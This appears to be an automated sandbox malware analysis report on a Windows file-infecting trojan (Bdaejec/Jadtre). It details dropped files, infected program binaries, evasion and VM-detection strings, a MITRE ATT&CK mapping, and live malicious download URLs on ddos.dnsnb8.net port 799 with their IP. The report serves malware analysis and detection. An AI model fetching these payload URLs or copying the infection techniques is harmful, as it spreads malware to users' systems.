Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0041357E push 0042DAAFh; ret	0_2_004135B1
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040217F push 0040D680h; ret	0_2_00402184

Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq entropy: 6.934503720718857
Source: TJytnf.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.93457078895935
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934657632422996
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934761876222671

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	File created: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1051

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C01718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C01754h

1_2_00C01718

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00C029E2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C02B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00C02B8C

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: TJytnf.exe, 00000001.00000003.1804798033.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804798033.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804737601.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AED000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804648171.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

API call chain: ExitProcess graph end node

graph_1-1026

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Code function: 0_2_00740044 mov eax, dword ptr fs:[00000030h]

0_2_00740044

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Code function: 0_2_004035A2 cpuid

0_2_004035A2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C01718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_00C01718

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C0139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00C0139F

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: TJytnf.exe PID: 7356, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: TJytnf.exe PID: 7356, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
biKy3nZEyJ.exe	100%	Avira	W32/Jadtre.B
biKy3nZEyJ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\TJytnf.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\TJytnf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarb	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/E	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarA	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar4u	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarw	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarV	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rar	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net/E	TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar:	TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarb	TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru	TJytnf.exe, 00000001.00000002.1981067567.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	TJytnf.exe, 00000001.00000003.1795628284.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarw	TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarA	TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarV	TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar4u	TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480645
Start date and time:	2024-07-24 22:21:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	biKy3nZEyJ.exe renamed because original name is a hash value
Original Sample Name:	98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Detection:	MAL
Classification:	mal81.spre.troj.evad.winEXE@5/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 56% Number of executed functions: 15 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: biKy3nZEyJ.exe

Simulations

Behavior and APIs

Time	Type	Description
16:22:51	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	987123[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	96ee8edc[1].exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exe	Get hash	malicious	Bdaejec, Oski Stealer, Vidar	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec, Sality	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	94E022CC268FEEE9F2A1A08260ECBB9767BFC0383CCABFB12330C30B5EDF4933.exe	Get hash	malicious	Bdaejec, Clipboard Hijacker	Browse	ddos.dnsnb8.net:799/cj//k5.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
